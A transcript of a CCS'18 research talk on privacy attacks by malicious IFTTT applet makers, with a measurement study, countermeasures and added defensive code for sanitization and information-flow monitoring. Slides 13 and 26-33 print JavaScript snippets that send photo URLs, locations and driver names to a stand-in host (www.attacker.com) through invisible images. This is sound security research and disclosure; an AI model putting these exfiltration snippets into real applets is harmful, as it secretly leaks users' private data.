Breaking and Fixing IoT Apps. Andrei Sabelfeld, joint work with Iulia Bastys and Musard Balliu. PowerPoint presentation (CCS’18 talk).


SLIDE 1

Breaking and Fixing IoT Apps

Andrei Sabelfeld

Joint work with Iulia Bastys and Musard Balliu. Appeared in CCS’18

SLIDE 2

Web of Things

“World Wide Web Consortium (W3C) is in a unique position to create the royalty-free and platform-independent standards needed to overcome the fragmentation of the IoT”

  • W3C CEO Dr. Jeff Jaffe, 2017

Internet of Things (IoT)

  • Incompatible standards, platforms, technologies

Security implications?
SLIDE 3

IoT apps

“Connecting otherwise unconnected services”

SLIDE 4

IoT apps

  • “Managing users’ digital lives”
    • Smart homes, smartphones, cars, fitness armbands
    • Online services (Google, Dropbox,…)
    • Social networks (Facebook, Twitter,…)
  • End-user programming
    • Anyone can create and publish apps
    • Most apps by third parties
    • Web interface + smartphone clients
SLIDE 5

IFTTT “If This Then That”

  • Trigger-action programming
  • Largest IoT app platform
  • Over 500 integrated services
  • Millions of users and billions of running apps
SLIDE 6

IFTTT app: If this then that

Trigger → Action

What can go wrong?

SLIDE 7

Attack by malicious app maker

SLIDE 10

IFTTT’s access control: If this then that

Trigger → Action

  • Users explicitly grant the app access
  • JavaScript “sandboxed”

SLIDE 11

URLs as universal glue: If this then that

Trigger → Action

  1. Upload new image file to IFTTT
  2. Put up image under public URL on ifttt.com
  3. Pass URL to Google Drive API for upload to Google

“Connecting otherwise unconnected services”

SLIDE 12

How to exfiltrate secrets?

  • Private information available via APIs
    • Private sources: Location, voice commands, images,…
  • Cannot directly exfiltrate from filter code
    • Public sinks?
    • Batch job programs with no I/O
    • “Can load the gun but not pull the trigger….”
SLIDE 13

URL attacks

  • “Load the gun and let somebody else pull the trigger”
  • URL upload attack
    • PhotoURL
    • 'https://attacker.com?' + encodeURIComponent(PhotoURL)
  • URL markup attack
    • Include an invisible image
    • '<img src=\"https://attacker.com?' + secret + '\" style=\"width:0px;height:0px;\">'
SLIDE 14

URL upload attack demo

SLIDE 15

URL markup attack demo

SLIDE 16

3rd-party applet attack surface (If this then that …)

  • Privacy
  • Integrity & availability

SLIDE 17

Empirical measurement study

  • Dataset by Mi et al. (May 2017)
    • 279,828 IFTTT app data: triggers and actions used
  • Classification of triggers and actions
    • Privacy, Integrity & Availability
    • Per category
  • Classification of applets
    • Private sources & public sink ⟹ potential privacy violation
    • High integrity sink ⟹ potential integrity violation
    • Possibility of skipping trigger ⟹ potential denial of service
  • 30% of apps potentially vulnerable
SLIDE 18

IFTTT triggers

[Bar chart: Number of triggers per category (axis 50 to 200), legend Private / Available / Public. Categories: appliances, blogging, bookmarking, business tools, calendars & scheduling, cloud storage, communication, connected car, contacts, developer tools, diy electronics, email, environment control & monitoring, finance & payments, health & fitness, journaling & personal data, location, mobile devices & accessories, music, news & information, notes, notifications, photo & video, power monitoring & management, security & monitoring systems, shopping, smart hubs & systems, social networks, survey tools, tags & beacons, task management & to-dos, time management & tracking, voice assistants]

SLIDE 19

IFTTT actions

[Bar chart: Cumulative number of actions per category (axis 20 to 180), legend Public / Untrusted / Available. Categories: appliances, blogging, bookmarking, business tools, calendars & scheduling, cloud storage, communication, connected car, contacts, developer tools, diy electronics, email, environment control & monitoring, gardening, health & fitness, journaling & personal data, lighting, mobile devices & accessories, music, news & information, notes, notifications, pet trackers, photo & video, power monitoring & management, routers & computer accessories, security & monitoring systems, shopping, smart hubs & systems, social networks, survey tools, task management & to-dos, time management & tracking, television & cable, tags & beacons]

SLIDE 20

Potential privacy violations

[Chart: potential privacy violations by trigger category and action category; both axes carry the same category list (appliances, blogging, bookmarking, business tools, calendars & scheduling, cloud storage, communication, connected car, contacts, developer tools, diy electronics, education, email, environment control & monitoring, finance & payments, health & fitness, journaling & personal data, lighting, location, mobile devices & accessories, music, news & information, notes, notifications, photo & video, power monitoring & management, routers & computer accessories, security & monitoring systems, shopping, smart hubs & systems, social networks, survey tools, tags & beacons, task management & to-dos, time management & tracking, voice assistants); scale 200 to 1000]

SLIDE 21

URL shortening attack demo

SLIDE 22

Countermeasures: break the flow

  • Per-app access control
    • Public app: no private sources
    • Private app: no public sinks
  • Cannot build URLs from strings, only via APIs
  • Output sanitization
  • Authenticated communication
    • Protect resources on CDNs by requiring authentication
  • If public URLs can’t be avoided
    • Shorten URL lifetime; already done by some CDNs
    • Secure URL shortening: 11-12 chars best practice
SLIDE 23

Public app

SLIDE 24

Private app
SLIDE 25

Countermeasures: track the flow

  • Track information flow in JavaScript code
    • Allow flow from public sources to attacker
      • Logo image with public URL
    • Block flow from private sources to attacker
      • Location leaks prevented
  • JSFlow
    • Information flow tracker for JavaScript
    • ECMA-262 v.5 support
    • jsflow.net
SLIDE 26

Types of flow: explicit

APPLET TITLE: Automatically back up your new iOS photos to Google Drive

TRIGGER: Any new photo

ACTION: Upload file from URL

FILTER & TRANSFORM:

```javascript
// Private source: the URL of the user's new photo
var publicPhotoURL = encodeURIComponent(IosPhotos.newPhotoInCameraRoll.PublicPhotoURL);
// Explicit flow: the secret becomes part of a URL on the attacker's host
var attack = 'www.attacker.com?' + publicPhotoURL;
// Public sink: Google Drive fetches the attacker's URL, which carries the secret
GoogleDrive.uploadFileFromUrlGoogleDrive.setUrl(attack);
```

SLIDE 28

Types of flow: explicit

APPLET TITLE: Automatically get an email every time you park your BMW with a map

TRIGGER: Car is parked

ACTION: Send me an email

FILTER & TRANSFORM:

```javascript
// Private source: map URL of the place where the car was parked
var loc = encodeURIComponent(Location.enterOrExitRegionLocation.LocationMapUrl);
// Legitimate map image shown to the user
var locImg = '<img src=\"' + Location.enterOrExitRegionLocation.LocationMapUrl + '\">';
// Explicit flow: invisible image whose URL carries the location to the attacker
var attack = '<img src=\"www.attacker.com?' + loc + '\" style=\" width:0px; height:0px; \">';
// Benign image from a whitelisted host
var iftttLogo = '<img src=\"www.ifttt.com/logo.png\" style=\" width:100px; height:100px; \">';
Email.sendMeEmail.setBody('I ' + Location.enterOrExitRegionLocation.EnteredOrExited + ' an area ' + locImg + iftttLogo + attack);
```

SLIDE 30

Types of flow: implicit

APPLET TITLE: Log your completed rides in Google Calendar

TRIGGER: Ride completed

ACTION: Quick add event

FILTER & TRANSFORM:

```javascript
var rideMap = Uber.rideCompleted.TripMapImage;
// Private source: the driver's name
var driver = Uber.rideCompleted.DriverName;
// Implicit flow: dst is never assigned from driver directly; each character is
// reconstructed by comparing driver[i] against every printable code point
var dst = [];
for (var i = 0; i < driver.length; i++) {
  for (var j = 32; j < 127; j++) {
    var t = driver[i] == String.fromCharCode(j);
    if (t) { dst[i] = String.fromCharCode(j); }
  }
}
var attack = '<img src=\"www.attacker.com?' + dst.join('') + '\" style=\" width:0px; height:0px; \">';
GoogleCalendar.quickAddEvent.setQuickAdd(rideMap + attack);
```

SLIDE 32

Types of flow: presence

APPLET TITLE: Get an email alert when your kids come home and connect to Almond

TRIGGER: A device has connected

ACTION: Send me an email

FILTER & TRANSFORM:

```javascript
// Presence flow: the body carries no secret, but the request for the
// (non-whitelisted) logo reveals that the trigger fired at all
var logo = '<img src=\"www.logo.com/350x150\" style=\" width:100px; height:100px; \">';
Email.sendAnEmail.setBody('Your kids just got home. ' + logo);
```

SLIDE 33

Types of flow: timing

APPLET TITLE: Automatically log your new Stripe payments to a Google spreadsheet

TRIGGER: New payment received

ACTION: Add row to spreadsheet

FILTER & TRANSFORM:

```javascript
var attack = '<img src=\"www.attacker.com\" style=\" width:0px; height:0px; \">';
// Timing flow: the loop runs as many iterations as the payment amount, so the
// filter's running time (and whether it hits the timeout) depends on the secret
var n = parseInt(Stripe.newPayment.Amount);
while (n > 0) { n--; }
GoogleSheets.appendToGoogleSpreadsheet.setFormattedRow('New Stripe payment ' + Stripe.newPayment.Amount + attack);
```

SLIDE 35

Types of flow

[Diagram: the URLs from the examples (www.attacker.com?privateData, www.ifttt.com/logo.png, www.attacker.com, www.logo.com/350x150, …) arranged by flow type: explicit, implicit, presence, timing]

SLIDE 36

Security policy

Whitelist: www.ifttt.com, www.google.com

Blacklist: www.attacker.com, www.logo.com

Attacker’s view: www.attacker.com?privateData, www.attacker.com and www.logo.com/350x150 are observable; www.ifttt.com/logo is not

SLIDE 37

Attacker’s view

'<img src=\"www.attacker.com?' + loc + '\" style=\" width:0px; height:0px; \">'|A = [ www.attacker.com?loc ]

'<img src=\"www.ifttt.com/logo\" style=\" width:100px; height:100px; \">'|A = ∅

'<img src=\"www.attacker.com?' + dst + '\" style=\" width:0px; height:0px; \">'|A = [ www.attacker.com?dst ]

'<img src=\"www.logo.com/350x150\" style=\" width:100px; height:100px; \">'|A = [ www.logo.com/350x150 ]

SLIDE 38

Projected security

Indistinguishability by attacker (~A): string1 ~A string2 if string1|A = string2|A
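As an added example (my own code, not from the paper or the slides), the projection |A of slides 36-38 and the indistinguishability ~A computed over sink strings, together with two of the “break the flow” countermeasures from slide 22: output sanitization at the sink and building URLs only through an API. It assumes the policy is a host whitelist (the hosts are those named on slide 36) and that the attacker observes exactly the URLs whose host is not whitelisted; the regular expressions, the function names and the sample strings are mine, constructed after the slide 37 examples.

```javascript
'use strict';
// Added example (my own code, not the paper's): attacker's view |A, the
// indistinguishability ~A it induces, an output sanitizer, and a URL-building
// API. Assumption: the attacker observes exactly the URLs to hosts outside
// the whitelist; everything else in the sink string is invisible to them.

const IMG_SRC = /<img\b[^>]*\bsrc\s*=\s*(?:"([^"]*)"|'([^']*)')[^>]*>/gi;
const BARE_URL = /(?:https?:\/\/|www\.)[^\s"'<>]+/g;

function hostOf(url) { return url.replace(/^https?:\/\//, '').split(/[/?#]/)[0]; }

// Every URL a mail client would fetch or a user could follow:
// <img src> values first, then bare URLs in the remaining text.
function urlsIn(text) {
  const out = [];
  for (const m of text.matchAll(IMG_SRC)) out.push(m[1] !== undefined ? m[1] : m[2]);
  for (const m of text.replace(IMG_SRC, ' ').matchAll(BARE_URL)) out.push(m[0]);
  return out;
}

// string|A : the URLs the attacker learns, i.e. those to non-whitelisted hosts.
function attackerView(text, whitelist) {
  return urlsIn(text).filter(u => !whitelist.includes(hostOf(u)));
}

// string1 ~A string2 iff string1|A = string2|A (slide 38).
function indistinguishable(s1, s2, whitelist) {
  const a = attackerView(s1, whitelist), b = attackerView(s2, whitelist);
  return a.length === b.length && a.every((u, i) => u === b[i]);
}

// Output sanitization at the sink: drop <img> tags and bare URLs whose host is
// not whitelisted, so the result is ~A-equivalent to the empty string.
function sanitize(text, whitelist) {
  const ok = u => whitelist.includes(hostOf(u));
  return text
    .replace(IMG_SRC, (tag, dq, sq) => (ok(dq !== undefined ? dq : sq) ? tag : ''))
    .replace(BARE_URL, u => (ok(u) ? u : ''));
}

// "Cannot build URLs from strings, only via APIs": the filter asks for a URL by
// host and path, and the API refuses hosts outside the policy, so an attacker
// URL cannot be assembled by string concatenation.
function buildUrl(host, path, whitelist) {
  if (!whitelist.includes(host)) throw new Error('host not in policy: ' + host);
  return 'https://' + host + '/' + encodeURIComponent(path);
}

// Constructed samples mirroring slide 37 (policy hosts from slide 36).
const WHITELIST = ['www.ifttt.com', 'www.google.com'];
const attackImg = loc => '<img src="www.attacker.com?' + loc + '" style="width:0px;height:0px;">';
const iftttLogo = '<img src="www.ifttt.com/logo" style="width:100px;height:100px;">';
const thirdPartyLogo = '<img src="www.logo.com/350x150" style="width:100px;height:100px;">';
```

Two emails that differ only in the map location have different views when the location sits in an attacker URL, but identical views when the only image is the IFTTT logo; `sanitize` turns the first case into the second, and `buildUrl` is what the filter would call instead of concatenating `'www.attacker.com?' + loc`.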

SLIDE 39

Vision: automated vetting (IFC)

Example verdict: “Insecure flow from Uber.rideCompleted.DriverName to www.attacker.com.”

SLIDE 40

Tracking the flow

  • Static enforcement: type system (explicit, implicit)
  • Dynamic enforcement: dynamic monitor (explicit, implicit, presence, timing)

SLIDE 41

Static enforcement

  • Flow-sensitive security type system
  • Flow-insensitive write effects
  • Flow-sensitive read effects

SLIDE 42

Static enforcement

```
imgLoc = img(h); attack = img(b + h); sink(imgLoc + attack);      INSECURE
logo = img(w1); if (h1) { logo = img(w2); } sink(h2 + logo);     SECURE
logo = img(b1); if (h1) { logo = img(b2); } sink(h2 + logo);     INSECURE
```

(h: secret, w: whitelisted URL, b: blacklisted URL)

Presence, timing: NOT HANDLED

SLIDE 43

Dynamic enforcement (JSFlow)

  • Single label
  • Step counter
  • JSFlow-based implementation
  • Evaluation on 60 apps
    • 30 secure and 30 insecure
    • Popular apps modelled
    • Filter code from forums
    • No false negatives
    • Single false positive (on “artificial” filter code)

SLIDE 44

Dynamic enforcement: presence & timing

  • triggering the app is sensitive & no timeout ⟹ no blacklisted URLs on the sink
  • triggering the applet is not sensitive & no timeout ⟹ monitor flows in the filter code

SLIDE 45

Dynamic enforcement

```
attack = img(b); while (h1 > 0) { h1--; } sink(h2 + attack);     INSECURE (timing)
logo = img(b); sink(“Your kids are home.” + logo);               INSECURE (presence)
```

Presence is decided by whether triggering the app is sensitive (“unless you park at hospital”): SECURE if it is not, INSECURE if it is
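The dynamic monitor of slides 43-45 reduced to a toy, as an added example (my own code, not JSFlow and not the paper's implementation). It assumes one secret label per URL, a program-counter label that stays raised once any branch has depended on a secret (a single-label simplification I adopt here, not necessarily how JSFlow does it), and a step counter standing in for the filter-code timeout; the sink check follows the two rules of slide 44 and the host whitelist of slide 36. `Monitor`, `branch`, `sink` and the scenario functions are my names; the scenarios re-create the filter code of slides 28, 32, 33 and 42.

```javascript
'use strict';
// Added example (my own code, not the paper's or JSFlow's): a toy dynamic
// monitor for IFTTT-style filter code. Assumptions: each URL carries one
// "secret" label; the pc label, once raised by a branch on a secret, stays
// raised (single-label simplification); a step budget emulates the timeout;
// the policy is a host whitelist with the hosts named on the slides.

const WHITELIST = ['www.ifttt.com', 'www.google.com'];

function hostOf(url) { return url.replace(/^https?:\/\//, '').split(/[/?#]/)[0]; }

class Monitor {
  constructor({ whitelist = WHITELIST, maxSteps = 100, triggerSensitive = false } = {}) {
    this.whitelist = whitelist;
    this.maxSteps = maxSteps;                 // step budget standing in for the timeout
    this.triggerSensitive = triggerSensitive; // presence: firing the trigger is itself private
    this.pc = false;                          // control flow has depended on a secret
    this.steps = 0;
    this.timedOut = false;
  }
  tick() { if (++this.steps > this.maxSteps) this.timedOut = true; }

  // Ingredients from the trigger: private sources are secret, others are not.
  secret(v) { return { v, secret: true, urls: [] }; }
  pub(v)    { return { v, secret: false, urls: [] }; }
  lit(v)    { return { v, secret: false, urls: [] }; }

  // <img> markup; the URL's label is secret when the URL string derives from a secret.
  img(url) {
    this.tick();
    const u = typeof url === 'string' ? this.lit(url) : url;
    return { v: '<img src="' + u.v + '" style="width:0px;height:0px;">',
             secret: u.secret, urls: [{ url: u.v, secret: u.secret }] };
  }
  concat(a, b) {
    this.tick();
    return { v: String(a.v) + String(b.v), secret: a.secret || b.secret, urls: a.urls.concat(b.urls) };
  }
  gt(a, n)  { this.tick(); return { v: a.v > n, secret: a.secret, urls: [] }; }
  sub(a, n) { this.tick(); return { v: a.v - n, secret: a.secret, urls: [] }; }
  // if/while guard: branching on a secret raises the pc label for the rest of the run.
  branch(cond) {
    this.tick();
    if (cond.secret) this.pc = true;
    return !this.timedOut && Boolean(cond.v);
  }

  // Sink check in the spirit of slide 44. Only URLs to non-whitelisted hosts are
  // attacker-observable, so secrets may reach the sink as long as no such URL
  // depends on them by data, by control flow, or by execution time.
  sink(out) {
    const bad = out.urls.filter(u => !this.whitelist.includes(hostOf(u.url)));
    if (this.timedOut) return { allowed: false, reason: 'timeout' };
    if (bad.length === 0) return { allowed: true, reason: 'no blacklisted URLs on the sink' };
    if (this.triggerSensitive) return { allowed: false, reason: 'presence flow' };
    if (bad.some(u => u.secret)) return { allowed: false, reason: 'explicit flow' };
    if (this.pc) return { allowed: false, reason: 'implicit or timing flow' };
    return { allowed: true, reason: 'blacklisted URLs independent of secrets' };
  }
}

// Slide 28: the location map URL (secret) is appended to an attacker URL.
function explicitFlow(mapUrl) {
  const m = new Monitor();
  const loc = m.secret(encodeURIComponent(mapUrl));
  const attack = m.img(m.concat(m.lit('www.attacker.com?'), loc));
  const logo = m.img('www.ifttt.com/logo.png');
  return m.sink(m.concat(logo, attack));
}

// Slide 42: a branch on secret h1 picks one of two logo hosts.
function logoChoice(h1, h2, hosts) {
  const m = new Monitor();
  let logo = m.img(hosts[0]);
  if (m.branch(m.secret(h1))) logo = m.img(hosts[1]);
  return m.sink(m.concat(m.secret(h2), logo));
}

// Slide 32: no secret in the body, but the trigger itself may be private.
function presenceFlow(triggerSensitive) {
  const m = new Monitor({ triggerSensitive });
  const logo = m.img('www.logo.com/350x150');
  return m.sink(m.concat(m.lit('Your kids just got home. '), logo));
}

// Slide 33: with `loop`, the number of iterations equals the payment amount.
function timingFlow(amount, maxSteps, loop) {
  const m = new Monitor({ maxSteps });
  const attack = m.img('www.attacker.com');
  let n = m.secret(amount);
  if (loop) { while (m.branch(m.gt(n, 0))) n = m.sub(n, 1); }
  const row = m.concat(m.lit('New Stripe payment '), m.secret(amount));
  return m.sink(m.concat(row, attack));
}
```

Each scenario returns the sink verdict and the flow type that caused it; `logoChoice` is accepted with whitelisted hosts and rejected with blacklisted ones, reproducing the SECURE/INSECURE pair of slide 42, and `timingFlow` is rejected either because the loop on the amount raises the pc label or because it exhausts the step budget.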

SLIDE 46

Coordinated disclosure

SLIDE 47

Conclusions

  • IoT apps increasingly popular
    • IFTTT, Zapier, Microsoft Flow
  • Vulnerable to attacks by malicious makers
    • URL upload
    • URL markup
    • URL shortening
  • Empirical study
    • 30% of IFTTT apps may violate privacy unnoticeably to users
  • Countermeasures
    • Short/medium-term: breaking the flow
    • Long-term: tracking the flow (JSFlow)

SLIDE 48

Information flow challenge: http://ifc-challenge.appspot.com/